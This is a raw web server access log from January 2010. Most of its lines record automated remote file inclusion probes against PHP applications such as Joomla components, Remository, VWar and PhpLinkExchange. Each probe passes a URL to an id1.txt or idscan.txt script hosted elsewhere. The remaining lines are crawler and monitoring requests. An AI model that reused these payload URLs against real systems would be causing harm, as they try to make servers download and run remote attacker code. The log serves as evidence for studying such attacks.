81.2.201.96 - - [05/Jan/2010:03:41:44 -0500] "GET /logs/error_log.Q109080700///products.php?prod=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:41:49 -0500] "GET /logs/access_log.Q109121400%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:03:42:13 -0500] "GET /logs/access_log.Q109121600 HTTP/1.1" 200 12171246 "-" "Yandex/1.01.001 (compatible; Win16; I)"
41.238.235.230 - - [05/Jan/2010:03:42:27 -0500] "GET /logs/access_log.Q109061700 HTTP/1.1" 200 4385823 "http://search.yahoo.com/search?fr=ieas&p=5.0.193.227" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.228.161.3 - - [05/Jan/2010:03:43:33 -0500] "GET ///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.828"
72.22.197.240 - - [05/Jan/2010:03:43:34 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:43:34 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:43:34 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:43:34 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:44:11 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:44:11 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:44:11 -0500] "GET /logs/access_log.Q109101600/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:44:11 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:44:11 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:44:12 -0500] "GET /logs/access_log.Q109101600/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.228.161.3 - - [05/Jan/2010:03:44:55 -0500] "GET /logs/access_log.Q109052700///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.828"
67.228.161.3 - - [05/Jan/2010:03:44:55 -0500] "GET ///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.828"
67.228.161.3 - - [05/Jan/2010:03:44:55 -0500] "GET /logs///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.828"
115.68.3.94 - - [05/Jan/2010:03:45:00 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:00 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:00 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:00 -0500] "GET /logs/access_log.Q109101600/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:02 -0500] "GET /logs/access_log.Q109101600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:02 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:08 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:09 -0500] "GET /logs/access_log.Q109101600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:09 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
67.228.161.3 - - [05/Jan/2010:03:45:15 -0500] "GET /logs/access_log.Q109070500///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.828"
115.68.3.94 - - [05/Jan/2010:03:45:37 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:45:39 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:03:45:53 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.47.7.71 - - [05/Jan/2010:03:46:49 -0500] "GET //admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:46:49 -0500] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:46:51 -0500] "GET //admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:46:51 -0500] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:46:58 -0500] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:46:58 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:46:58 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:00 -0500] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:00 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:00 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:01 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:01 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:01 -0500] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:47:02 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:06 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:47:07 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:47:07 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:47:07 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:08 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:08 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:08 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:08 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:08 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:08 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:08 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:03:47:12 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://via.wen.ru/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:15 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:47:16 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:03:48:29 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:03:48:29 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:03:48:29 -0500] "GET /logs/access_log.Q109100200%20%20//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:03:48:46 -0500] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:03:49:58 -0500] "GET /logs/error_log.Q109070400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.12.99 - - [05/Jan/2010:03:50:59 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.160.17.200 - - [05/Jan/2010:03:52:03 -0500] "GET /logs/access_log.Q109072900//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:03 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:03 -0500] "GET //index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:03 -0500] "GET /logs/access_log.Q109090900//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:22 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:22 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:22 -0500] "GET /logs/access_log.Q109062300%20%20//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:22 -0500] "GET //index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:22 -0500] "GET /logs/access_log.Q109072900//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:22 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:22 -0500] "GET /logs/access_log.Q109090900//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:24 -0500] "GET /logs/access_log.Q109062300%20%20//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:24 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:27 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:27 -0500] "GET /logs/access_log.Q109103100%20%20//admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:28 -0500] "GET /logs/access_log.Q109103100%20%20//admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:28 -0500] "GET /logs/access_log.Q109072900//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:28 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:28 -0500] "GET //index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:52:33 -0500] "GET /logs/access_log.Q109090900//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:39 -0500] "GET /logs/access_log.Q109051200%20%20//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:03:52:40 -0500] "GET /logs/access_log.Q109051200%20%20//modules/vwar/admin/admin.php?vwar_root=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:54:17 -0500] "GET /logs/access_log.Q109072900%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:54:17 -0500] "GET /logs/access_log.Q109090900%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:54:46 -0500] "GET /logs/access_log.Q109072900%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:54:46 -0500] "GET /logs/access_log.Q109090900%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:54:50 -0500] "GET /logs/access_log.Q109072900%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:54:50 -0500] "GET /logs/access_log.Q109090900%20%20//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:03:55:54 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.65.7 - - [05/Jan/2010:03:56:35 -0500] "GET /images/Office%20Supply/prt_headimage.gif HTTP/1.1" 200 6301 "-" "Googlebot-Image/1.0"
67.195.114.54 - - [05/Jan/2010:03:57:03 -0500] "GET /logs/error_log.Q109060100 HTTP/1.0" 200 2214076 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [05/Jan/2010:03:57:05 -0500] "GET /logs/error_log.Q109060100 HTTP/1.0" 200 2214076 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [05/Jan/2010:03:57:42 -0500] "GET /logs/error_log.Q109060300 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
72.22.197.240 - - [05/Jan/2010:03:58:04 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:58:04 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:58:04 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:58:04 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:30 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:30 -0500] "GET /logs/access_log.Q109072900%20%20//index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:30 -0500] "GET //index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:30 -0500] "GET /logs/access_log.Q109090900%20%20//index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:32 -0500] "GET /logs/access_log.Q109072900%20%20//index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:32 -0500] "GET //index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:32 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:03:58:32 -0500] "GET /logs/access_log.Q109090900%20%20//index.php?DOCUMENT_ROOT=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:27 -0500] "GET /logs/access_log.Q109052100/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:27 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:27 -0500] "GET /logs/access_log.Q109101600/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:27 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:28 -0500] "GET /logs/access_log.Q109052100/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:28 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:28 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:59:28 -0500] "GET /logs/access_log.Q109101600/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:59:37 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:59:37 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:59:37 -0500] "GET /logs/access_log.Q109102500/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:59:46 -0500] "GET /logs/access_log.Q109102500/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:59:46 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:03:59:46 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:02:04 -0500] "GET //oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:04:02:04 -0500] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:04:02:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.47.7.71 - - [05/Jan/2010:04:02:26 -0500] "GET /logs/access_log.Q109071400%20%20//oneadmin/photogallery/include.php?path[docroot]=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
